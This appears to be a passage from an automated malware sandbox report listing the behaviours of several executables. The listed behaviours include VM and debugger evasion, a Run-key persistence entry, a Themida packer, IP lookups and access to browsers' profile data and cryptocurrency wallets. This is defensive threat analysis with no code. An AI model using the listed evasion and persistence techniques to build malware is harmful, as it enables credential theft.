| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\wQnYcwTFdlCGSxJ7X54kBjwQ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\wQnYcwTFdlCGSxJ7X54kBjwQ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\5tUBHcAl1axgrDZU8jXaJml_.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\5tUBHcAl1axgrDZU8jXaJml_.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\YI1cG6E7TWNKv6wgTSb6ZnEL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\U0qg5OeBRy2wHno8PFCKoguA.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\U0qg5OeBRy2wHno8PFCKoguA.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Users\Admin\AppData\Roaming\4529314.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\wQnYcwTFdlCGSxJ7X54kBjwQ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\U0qg5OeBRy2wHno8PFCKoguA.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\5tUBHcAl1axgrDZU8jXaJml_.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\G7QyhA8sJ7kHeEyy4wYfFRug.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\YI1cG6E7TWNKv6wgTSb6ZnEL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\nC4tc_PZvdWBmLWn8ZdWpSlo.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | geoiptool.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\wQnYcwTFdlCGSxJ7X54kBjwQ.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\U0qg5OeBRy2wHno8PFCKoguA.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\5tUBHcAl1axgrDZU8jXaJml_.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\G7QyhA8sJ7kHeEyy4wYfFRug.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\YI1cG6E7TWNKv6wgTSb6ZnEL.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\nC4tc_PZvdWBmLWn8ZdWpSlo.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\rI67ExprUJepuTcOX5cceK3u.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Users\Admin\AppData\Roaming\4990795.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\4990795.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Roaming\4990795.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\4990795.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Roaming\4990795.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Roaming\4990795.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
